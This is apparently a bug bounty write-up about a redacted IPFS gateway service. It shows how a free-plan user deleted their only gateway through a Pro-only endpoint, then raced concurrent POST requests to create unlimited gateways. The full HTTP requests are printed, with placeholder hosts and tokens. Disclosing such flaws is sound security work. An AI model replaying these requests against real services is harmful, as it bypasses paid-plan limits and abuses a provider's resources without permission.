Restricted? Not Anymore! Exploiting a Simple race condition Flaw

بِسْم اللَّه الرَّحْمن الرَّحِيم . . اللَّهمَّ صَلِّ وَسلَّم وبارك على نَبِينَا مُحمَّد

## Introduction

Hey, Geeks! Today, I’m diving into an exciting chain bug I found with my buddy @karemelsqary during a private bug bounty program. This vulnerability let free plan users on a popular IPFS service create unlimited gateways — something they definitely shouldn’t have been able to do — by exploiting a race condition after deleting their only gateway.

## Background

Redacted is a well-known platform that provides IPFS pinning and gateway services, enabling users to store and access files in a decentralized manner. One of its standout features is the ability to create custom gateways — dedicated URLs for accessing IPFS content.

The system’s supposed to lock it down: free plan users can’t delete their sole gateway, ensuring they always have one to work with. But I spotted a crack in that armor — a flaw that not only let me trash that lone gateway but also opened the door to spinning up as many new ones as I wanted via a race condition. Let’s break it down.

## The Bug: A Two-Part Vulnerability

This chain bug consists of two critical issues:

1. Gateway Deletion Flaw: A gateway deletion issue where free users could delete their only gateway despite an error message, leaving the account in an invalid state.

2. A race condition that let users bypass the gateway limit by sending concurrent creation requests, enabling unlimited gateway creation.

Together, these issues allowed free plan users to abuse the system, creating as many gateways as they wanted

# Step 1: Retrieve the Gateway ID

First, I needed to retrieve the ID of the existing gateway. This was done by sending a GET request to the `/v3/ipfs/gateways` endpoint.

GET /v3/ipfs/gateways?page=1&pageSize=10 HTTP/1.1
Host: api.example.cloud
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-example-Origin: frontend
Authorization: Bearer <token>

The response contained the list of gateways, including their IDs. For this example, let’s assume the gateway ID is `xxxxxxxx–xxxx-xxxx-xxxx-xxxxxxxx`.

# Step 2: Delete the Only Gateway

Even though free users didn’t have a delete function, I noticed it existed for Pro users.

By extracting the request format and replacing the token and ID, I sent:

DELETE /v3/ipfs/gateways/xxxxxxxx–xxxx-xxxx-xxxx-xxxxxxxx HTTP/1.1
Host: api.example.cloud
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-example-Origin: frontend
Authorization: Bearer <token>
Source: login
Origin: https://app.example.cloud
Referer: https://app.example.cloud/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: corsh

Interestingly, even though the server returned an error (likely indicating that deleting the last gateway is not allowed),

the gateway was still deleted. This left the account in an invalid state with zero gateways.

# Step 3: Exploit the Race Condition to Create Unlimited Gateways

With the account now having no gateways, I could exploit a race condition by sending multiple concurrent POST requests to the `/v3/ipfs/gateways` endpoint to create new gateways.

POST /v3/ipfs/gateways HTTP/1.1
Host: api.example.cloud
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-example-Origin: frontend
Authorization: Bearer <token>
Source: login
Content-Length: 37
Origin: https://app.example.cloud
Referer: https://app.example.cloud/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Priority: u=0
Te: trailers
{"domain": "red-implicit-wallaby-406"}

By sending multiple requests simultaneously, I bypassed the free plan’s limit and created unlimited gateways before the system could enforce restrictions.

## Impact of the Bug

- Bypassing Free Plan Restrictions: Free plan users could create an unlimited number of gateways, which is a feature typically reserved for paid plans. This undermines the platform’s business model and fair usage policies.

Thank you for reviewing this Writeup 3>